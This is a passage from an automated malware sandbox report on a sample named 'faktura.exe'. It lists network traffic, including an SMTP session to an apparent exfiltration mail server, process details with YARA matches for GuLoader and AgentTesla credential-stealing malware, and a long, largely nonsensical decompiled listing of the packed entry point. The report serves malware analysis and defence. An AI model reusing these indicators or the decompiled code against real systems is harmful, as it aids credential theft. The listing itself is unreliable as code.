Apr 12, 2021 12:32:41.344455004 CEST	61531	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:41.470510960 CEST	53	61531	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:42.314495087 CEST	49228	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:42.364402056 CEST	53	49228	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:43.230549097 CEST	59794	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:43.289160967 CEST	53	59794	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:43.710417986 CEST	55916	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:43.782314062 CEST	53	55916	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:43.841063023 CEST	52752	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:43.912854910 CEST	53	52752	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:53.730091095 CEST	60542	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:53.783735037 CEST	53	60542	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:53.892374039 CEST	60689	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:53.962152958 CEST	53	60689	8.8.8.8	192.168.2.4
Apr 12, 2021 12:32:56.057111979 CEST	64206	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:32:56.118586063 CEST	53	64206	8.8.8.8	192.168.2.4
Apr 12, 2021 12:33:28.757922888 CEST	50904	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:33:28.806732893 CEST	53	50904	8.8.8.8	192.168.2.4
Apr 12, 2021 12:33:30.481461048 CEST	57525	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:33:30.546253920 CEST	53	57525	8.8.8.8	192.168.2.4
Apr 12, 2021 12:33:44.203052998 CEST	53814	53	192.168.2.4	8.8.8.8
Apr 12, 2021 12:33:44.354367971 CEST	53	53814	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 12, 2021 12:32:15.361759901 CEST	192.168.2.4	8.8.8.8	0x31f0	Standard query (0)	doc-0o-7c-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Apr 12, 2021 12:33:44.203052998 CEST	192.168.2.4	8.8.8.8	0x1826	Standard query (0)	mail.felgui.pt	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 12, 2021 12:32:15.426651001 CEST	8.8.8.8	192.168.2.4	0x31f0	No error (0)	doc-0o-7c-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 12:32:15.426651001 CEST	8.8.8.8	192.168.2.4	0x31f0	No error (0)	googlehosted.l.googleusercontent.com		216.58.215.225	A (IP address)	IN (0x0001)
Apr 12, 2021 12:33:44.354367971 CEST	8.8.8.8	192.168.2.4	0x1826	No error (0)	mail.felgui.pt	felgui.pt		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 12:33:44.354367971 CEST	8.8.8.8	192.168.2.4	0x1826	No error (0)	felgui.pt		185.31.158.175	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 12, 2021 12:32:15.538513899 CEST	216.58.215.225	443	192.168.2.4	49742	CN=*.googleusercontent.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Tue Mar 16 20:32:57 CET 2021 Thu Jun 15 02:00:42 CEST 2017	Tue Jun 08 21:32:56 CEST 2021 Wed Dec 15 01:00:42 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Apr 12, 2021 12:32:15.538513899 CEST	216.58.215.225	443	192.168.2.4	49742	CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Thu Jun 15 02:00:42 CEST 2017	Wed Dec 15 01:00:42 CET 2021		37f463bf4616ecd445d4a1937da06e19

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Apr 12, 2021 12:33:44.695185900 CEST	587	49773	185.31.158.175	192.168.2.4	220-servidor3.scpdpi.pt ESMTP Exim 4.94 #2 Mon, 12 Apr 2021 11:33:44 +0100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 12, 2021 12:33:44.695745945 CEST	49773	587	192.168.2.4	185.31.158.175	EHLO 715575
Apr 12, 2021 12:33:44.792510986 CEST	587	49773	185.31.158.175	192.168.2.4	250-servidor3.scpdpi.pt Hello 715575 [84.17.52.3] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-X_PIPE_CONNECT 250-STARTTLS 250 HELP
Apr 12, 2021 12:33:44.793549061 CEST	587	49773	185.31.158.175	192.168.2.4	421 servidor3.scpdpi.pt lost input connection

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: faktura.exe PID: 7016 Parent PID: 5792

General

Start time:	12:31:55
Start date:	12/04/2021
Path:	C:\Users\user\Desktop\faktura.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\faktura.exe'
Imagebase:	0x400000
File size:	86016 bytes
MD5 hash:	4A4501E0665974A9AEE852EA13E6E7F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 6160 Parent PID: 7016

General

Start time:	12:32:03
Start date:	12/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\faktura.exe'
Imagebase:	0x310000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegAsm.exe PID: 6148 Parent PID: 7016

General

Start time:	12:32:03
Start date:	12/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\faktura.exe'
Imagebase:	0xbd0000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000003.00000002.904555277.0000000000FA1000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.908261249.000000001DCC1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.908261249.000000001DCC1000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3476 Parent PID: 6148

General

Start time:	12:32:04
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: faktura.exe PID: 7016 Parent PID: 5792 faktura.exeCOMMON

Executed Functions

Function 004015B8, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 477
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			_entry_(char _a1, signed int* _a4, intOrPtr _a64, intOrPtr _a74, signed int _a114, char _a120) {
				signed int _v1;
				signed int _v13;
				intOrPtr _v17;
				signed int _v21;
				short _v32;
				char _v48;
				intOrPtr _v52;
				signed int _v56;
				signed int _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v116;
				char _v132;
				intOrPtr _v140;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				void* _v164;
				void* _v168;
				char _v172;
				char _v176;
				intOrPtr _v180;
				char _v184;
				signed int _v188;
				signed int _v192;
				signed int* _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int* _v212;
				signed int _v216;
				signed int _v220;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int* _v244;
				signed int _v248;
				signed int* _v252;
				signed int _v256;
				signed int* _v260;
				signed int _v264;
				signed int _v268;
				signed int* _v272;
				signed int _v276;
				signed int* _v280;
				signed int _v284;
				signed int* _v288;
				signed int _v292;
				signed int* _v296;
				signed int _v300;
				signed int* _v304;
				signed int _v308;
				signed int* _v312;
				signed int _v316;
				signed int _v320;
				signed int* _v324;
				signed int _v328;
				signed int* _v332;
				signed int _v336;
				signed int* _v340;
				signed int _v344;
				signed int* _v348;
				signed int _v352;
				signed int* _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;

				_push("VB5!6&*");
				while(1) {
					_pop(ss);
					__eax = __eax + 1;
					__al = __al + __ch;
					asm("out dx, al");
					asm("invalid");
					 *__eax =  *__eax + 1;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __dh;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					_t1 = __esi + 0xc;
					_t2 = __bl;
					__bl =  *_t1;
					 *_t1 = _t2;
					__cl = 0x21;
					asm("pushad");
					__ecx = 0x77af8e44;
					asm("in eax, dx");
					asm("cld");
					__esi = __esi - 1;
					__eflags =  *__eax & __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *0x77af8e44 =  *0x77af8e44 + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __ch;
					_pop(__edi);
					asm("sbb [ebx], al");
					_push(__edx);
					_push(__ebp);
					__esi = __esi - 1;
					__esp = __esp + 1;
					_push(__esp);
					_push(__ebp);
					_push(__edx);
					__ebp =  &_a1;
					 *__eax =  *__eax + 0x21;
					__ecx = 0x77af8e45;
					 *__eax =  *__eax + __ah;
					 *0x77af8e44 =  *0x77af8e44 | __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					__esp = __esp - 1;
					 *__eax =  *__eax ^ __eax;
					__eax = __eax + 0xe72de951;
					__eflags = __eax;
					if(__eflags < 0) {
						break;
					}
					asm("lds eax, [ebx-0x75]");
					if(__eflags < 0) {
						continue;
					}
					0xa739f571();
					asm("lahf");
					__eax = __eax - 1;
					_push(__edi);
					asm("a16 loopne 0xffffffa3");
					asm("scasb");
					__edx = __edx + 1;
					_t5 = __eax;
					__eax = __esi;
					__esi = _t5;
					 *((intOrPtr*)(__edx + __ebx * 2 - 0x39)) =  *((intOrPtr*)(__edx + __ebx * 2 - 0x39)) + __ebx;
					__ebx -  *((intOrPtr*)(__ebx + 0x6f)) = 0x21 -  *((intOrPtr*)(__edi - 0x53));
					__ebx = __ebx ^  *0x2EC15DAA;
					asm("stosb");
					 *((intOrPtr*)(__eax - 0x2d)) =  *((intOrPtr*)(__eax - 0x2d)) + __ah;
					_t17 = __eax;
					__eax = __ebx;
					__ebx = _t17;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					__esp = __esp + 1;
					 *__eax =  *__eax + __eax;
					 *__ebx =  *__ebx + __bl;
					 *__eax =  *__eax + __al;
					 *0x41454700 =  *0x41454700 + __al;
					_push(__edx);
					_push(__ebx);
					 *0x46001401 =  *0x46001401 + 0x21;
					__eflags =  *0x46001401;
					_push(0x6c);
					if(__eflags < 0) {
						L14:
						if(__eflags < 0) {
							L28:
							_t31 = __eax + 0x78655400;
							 *_t31 =  *(__eax + 0x78655400) + __al;
							__eflags =  *_t31;
							L29:
							__al = __al + 5;
							_t33 =  &_a120;
							 *_t33 = _a120 + __dl;
							__eflags =  *_t33;
							if( *_t33 == 0) {
								L34:
								__eax = __eax +  *__ecx;
								_push(es);
								_t35 = __edx + 0x65;
								 *_t35 =  *(__edx + 0x65) + __al;
								__eflags =  *_t35;
								asm("a16 insb");
								if( *_t35 != 0) {
									L41:
									__eflags = __al & 0x00000017;
									__eax = __eax + 1;
									__ah = __ah + __al;
									asm("adc eax, 0x780040");
									 *__eax =  *__eax + __al;
									_t48 = __al;
									__al =  *__eax;
									 *__eax = _t48;
									 *__eax =  *__eax + __al;
									 *__eax =  *__eax + __al;
									 *__ecx =  *__ecx + __dl;
									 *__eax =  *__eax + __al;
									 *__eax =  *__eax + __al;
									 *__eax =  *__eax + __al;
									 *__eax =  *__eax + __al;
									 *__eax =  *__eax + __al;
									 *__eax =  *__eax + __al;
									 *__eax =  *__eax + __al;
									_t49 = __esi + 0x6f + __ebp * 2;
									 *_t49 =  *(__esi + 0x6f + __ebp * 2) + __ch;
									__eflags =  *_t49;
									asm("outsb");
									asm("outsd");
									if(__eflags <= 0) {
										L51:
										 *__eax =  *__eax + __al;
										 *__esi =  *__esi | __dl;
										__eflags =  *__esi;
										goto L52;
									} else {
										if(__eflags < 0) {
											L52:
											_push(ss);
											__eax = __eax + 1;
											 *(__eax + __eax) =  *(__eax + __eax) + __cl;
											 *__eax =  *__eax + __dl;
											 *__eax =  *__eax + __al;
											__eflags =  *__eax;
											_push(__esi);
											asm("in eax, 0xa9");
											__eax =  *0x4617d711;
											L53:
											asm("adc edi, edx");
											_pop(ss);
											__esi = __esi + 1;
											__eflags = __esi;
											L54:
											__ax = __eax;
											_t62 = __eax;
											__eax = __edi;
											__edi = _t62;
											if(__eflags != 0) {
												L49:
												_t57 = __eax;
												__eax = __ebx;
												__ebx = _t57;
												asm("lds eax, [ebx-0x75]");
												if(__eflags < 0) {
													L40:
													asm("sbb [eax], al");
													goto L41;
												}
												0xa739f7ac();
												 *__eax =  *__eax + __al;
												 *__eax =  *__eax + __al;
												 *__eax =  *__eax + __al;
												 *__eax =  *__eax + __al;
												 *__eax =  *__eax + __al;
												 *__eax =  *__eax + __al;
												 *__eax =  *__eax + __al;
												 *__eax =  *__eax + __al;
												 *__eax =  *__eax + __al;
												 *__eax =  *__eax + __al;
												__al = __al +  *__eax;
												 *__eax =  *__eax + __al;
												 *__eax =  *__eax + __al;
												 *__eax =  *__eax + __al;
												 *__eax =  *__eax + __al;
												 *__eax =  *__eax + __al;
												 *__eax =  *__eax + __al;
												 *__eax =  *__eax + __al;
												 *__eax =  *__eax + __al;
												 *__eax =  *__eax + __al;
												 *__eax =  *__eax + __al;
												_a1 = _a1 + __bl;
												 *__eax =  *__eax + __al;
												__eflags =  *__eax;
												goto L51;
											}
											asm("lock clc");
											asm("rol byte [ecx], cl");
											L56:
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __eax;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											 *__eax =  *__eax + __al;
											_a74 = _a74 + __ch;
											 *__eax =  *__eax + __al;
											__ah = __ah + __dl;
											__esi = __esi + 1;
											__eax = __eax + 1;
											 *((intOrPtr*)(__eax + __eax + 0x60000)) =  *((intOrPtr*)(__eax + __eax + 0x60000)) + __bl;
											 *__eax =  *__eax + __al;
											__al = 0x43;
											__eax = __eax + 1;
											 *__edi =  *__edi + 0x43;
											 *__eax =  *__eax + 0x43;
											__al = 0x86;
											__eflags = __eax - 0x70040;
											 *__eax =  *__eax + 0x43;
											__eflags = __eax - 0x70040;
											 *__eax =  *__eax + 0x43;
											asm("sbb al, 0x3d");
											__eax = __eax + 1;
											 *__edi =  *__edi + 0x43;
											 *__eax =  *__eax + 0x43;
											__ah = __ah + __bl;
											__eflags = 0x43 - 0x40;
											 *__edi =  *__edi + 0x43;
											 *__eax =  *__eax + 0x43;
											 *((intOrPtr*)(__esp + __edi + 0x70040)) =  *((intOrPtr*)(__esp + __edi + 0x70040)) + __cl;
											 *__eax =  *__eax + 0x43;
											 *(__eax + __eax * 2) =  *(__eax + __eax * 2) ^ __bh;
											 *__edi =  *__edi + 0x43;
											 *__eax =  *__eax + 0x43;
											__ah = __ah + __ch;
											__eflags = __eax -  *__eax;
											_pop(es);
											 *__eax =  *__eax + 0x43;
											 *((intOrPtr*)(__ebx + __edi + 0x70040)) =  *((intOrPtr*)(__ebx + __edi + 0x70040)) + __ah;
											 *__eax =  *__eax + 0x43;
											_pop(__esp);
											__eflags = __eax -  *__eax;
											_pop(es);
											 *__eax =  *__eax + 0x43;
											 *((intOrPtr*)(__ebx + __edi)) =  *((intOrPtr*)(__ebx + __edi)) + __dl;
											__eax = __eax + 1;
											 *__edi =  *__edi + 0x43;
											 *__eax =  *__eax + 0x43;
											__al = 0x86 + __al;
											__eflags = 0x43 -  *__eax;
											_pop(es);
											 *__eax =  *__eax + 0x43;
											 *((intOrPtr*)(__eax + 0x3a)) =  *((intOrPtr*)(__eax + 0x3a)) + __ah;
											__eax = __eax + 1;
											 *__edi =  *__edi + 0x43;
											 *__eax =  *__eax + 0x43;
											 *__eax =  *__eax + __dl;
											__eflags = 0x43 -  *__eax;
											_pop(es);
											 *__eax =  *__eax + 0x43;
											 *((intOrPtr*)(__ecx + __edi + 0x70040)) =  *((intOrPtr*)(__ecx + __edi + 0x70040)) + __bh;
											 *__eax =  *__eax + 0x43;
											asm("pushad");
											__eflags =  *__eax - __eax;
											_pop(es);
											 *__eax =  *__eax + 0x43;
											 *__eax =  *__eax + __dl;
											__eflags =  *__eax - __eax;
											_pop(es);
											 *__eax =  *__eax + 0x43;
											 *((intOrPtr*)(__eax + __edi + 0x70040)) =  *((intOrPtr*)(__eax + __edi + 0x70040)) + __dh;
											 *__eax =  *__eax + 0x43;
											__eflags =  *__eax - 0x43;
											es = __esp;
											 *__eax =  *__eax + 0x43;
											__ah = __ah + __ch;
											asm("aaa");
											__eax = __eax + 1;
											 *__edi =  *__edi + 0x43;
											 *__eax =  *__eax + 0x43;
											 *((intOrPtr*)(__edi + __esi + 0x70040)) =  *((intOrPtr*)(__edi + __esi + 0x70040)) + __bl;
											 *__eax =  *__eax + 0x43;
											__eflags = 0x43 - 0x37;
											__eax = __eax + 1;
											 *__edi =  *__edi + 0x43;
											 *__eax =  *__eax + 0x43;
											 *__eax =  *__eax + __cl;
											asm("aaa");
											__eax = __eax + 1;
											 *__edi =  *__edi + 0x43;
											 *__eax =  *__eax + 0x43;
											 *((intOrPtr*)(__eax + 0x7004036)) =  *((intOrPtr*)(__eax + 0x7004036)) + __dh;
											 *__eax =  *__eax + 0x43;
											 *((intOrPtr*)(__eax + 0x36)) =  *((intOrPtr*)(__eax + 0x36)) + __dl;
											__eax = __eax + 1;
											 *__edi =  *__edi + 0x43;
											 *__eax =  *__eax + 0x43;
											__al = __al + __bh;
											__eax = __eax ^ 0x00070040;
											 *__eax =  *__eax + __al;
											__al = 0x35;
											__eax = __eax + 1;
											 *__edi =  *__edi + 0x35;
											 *__eax =  *__eax + 0x35;
											 *((intOrPtr*)(__esi + 0x70040)) =  *((intOrPtr*)(__esi + 0x70040)) + __bh;
											 *__eax =  *__eax + 0x35;
											asm("in al, dx");
											__al = 0x75;
											 *__edi =  *__edi + 0x35;
											 *__eax =  *__eax + 0x35;
											 *((intOrPtr*)(__eax + 0x7004034)) =  *((intOrPtr*)(__eax + 0x7004034)) + __bl;
											 *__eax =  *__eax + 0x35;
											 *((intOrPtr*)(__eax + 0x34)) =  *((intOrPtr*)(__eax + 0x34)) + 0x35;
											__eax = __eax + 1;
											 *__edi =  *__edi + 0x35;
											 *__eax =  *__eax + 0x35;
											__al = 0x75 + __ch;
											__eax = __eax ^  *__eax;
											 *__eax =  *__eax + __eax;
											 *__eax =  *__eax + __eax;
											 *__edx =  *__edx << 1;
											__eax = __eax + 1;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *((intOrPtr*)(__eax - 0x6e)) =  *((intOrPtr*)(__eax - 0x6e)) + __ah;
											__eax = __eax + 1;
											__bh = __bh + __bh;
											asm("invalid");
											 *__eax =  *__eax + 1;
											 *__eax =  *__eax + 0x35;
											 *((intOrPtr*)(__ebx + 0x40)) =  *((intOrPtr*)(__ebx + 0x40)) + __dl;
											 *((intOrPtr*)(__eax + __esi)) =  *((intOrPtr*)(__eax + __esi)) + __bl;
											__ecx = __ecx + 1;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + __dh;
											__eflags =  *__edx & __esp;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											_pop(__esp);
											asm("sbb al, [eax]");
											 *__eax =  *__eax + __eax;
											 *__eax =  *__eax + 0x35;
											__esi = __esi + 1;
											__eax = __eax + 1;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *((intOrPtr*)(__edx + __ebx + 0x40)) =  *((intOrPtr*)(__edx + __ebx + 0x40)) + __bl;
											 *__ecx =  *__ecx + 0x35;
											 *__eax =  *__eax + 0x35;
											 *((intOrPtr*)(__edx + __ebx + 0x40)) =  *((intOrPtr*)(__edx + __ebx + 0x40)) + __ah;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *((intOrPtr*)(__eax + 0x1a)) =  *((intOrPtr*)(__eax + 0x1a)) + __ah;
											__eax = __eax + 1;
											 *__edx =  *__edx + 0x35;
											 *__eax =  *__eax + 0x35;
											 *((intOrPtr*)(__edx + __ebx + 0x40)) =  *((intOrPtr*)(__edx + __ebx + 0x40)) + __ah;
											 *__eax =  *__eax + 0x35;
											 *((intOrPtr*)(__edi + 0x6c006801)) =  *((intOrPtr*)(__edi + 0x6c006801)) + __dh;
											 *((intOrPtr*)(__edx + __ebx + 0x34c40040)) =  *((intOrPtr*)(__edx + __ebx + 0x34c40040)) + __dh;
											__ecx = __ecx + 1;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *((intOrPtr*)(__esp + 0x46a00068 + __ebx * 2)) =  *((intOrPtr*)(__esp + 0x46a00068 + __ebx * 2)) + __dh;
											__eax = __eax + 1;
											 *((intOrPtr*)(__eax + 0x40004046)) =  *((intOrPtr*)(__eax + 0x40004046)) + __dh;
											 *__ecx =  *__ecx + __dl;
											 *(__eax + __eax) =  *(__eax + __eax) + __dh;
											 *__eax =  *__eax + 0x35;
											 *0x10040 =  *0x10040 & __ah;
											__eax = __eax +  *__eax;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											__ah = 0x1a;
											__eax = __eax + 1;
											 *((intOrPtr*)(__eax - 0x3fff9c9f)) =  *((intOrPtr*)(__eax - 0x3fff9c9f)) + __bh;
											__esi = __esi + 1;
											__eax = __eax + 1;
											 *__ecx =  *__ecx + 0x35;
											 *__ebx =  *__ebx + 0x35;
											 *__eax =  *__eax + 0x35;
											_pop(ds);
											 *__eax =  *__eax + __bh;
											 *__eax =  *__eax + 0x35;
											 *0xffff0040 =  *0xffff0040 + __bh;
											asm("invalid");
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											asm("adc [ebx], bl");
											__eax = __eax + 1;
											__al = 0x75 + __ch + __cl;
											asm("popad");
											asm("arpl [eax], ax");
											__esp = __esp - 1;
											__eax = __eax & 0xffff0040;
											asm("invalid");
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											asm("sbb al, [fs:eax]");
											asm("in al, 0x19");
											__eax = __eax + 1;
											 *((intOrPtr*)(__esi - 0x5bffbfeb)) =  *((intOrPtr*)(__esi - 0x5bffbfeb)) + __bl;
											asm("adc eax, 0x15aa0040");
											__eax = __eax + 1;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *((intOrPtr*)(__edx + __ebx + 0x19e40040)) =  *((intOrPtr*)(__edx + __ebx + 0x19e40040)) + __cl;
											__eax = __eax + 1;
											 *((intOrPtr*)(__esi - 0x5bffbfeb)) =  *((intOrPtr*)(__esi - 0x5bffbfeb)) + __bl;
											asm("adc eax, 0x15aa0040");
											__eax = __eax + 1;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
											 *__eax =  *__eax + 0x35;
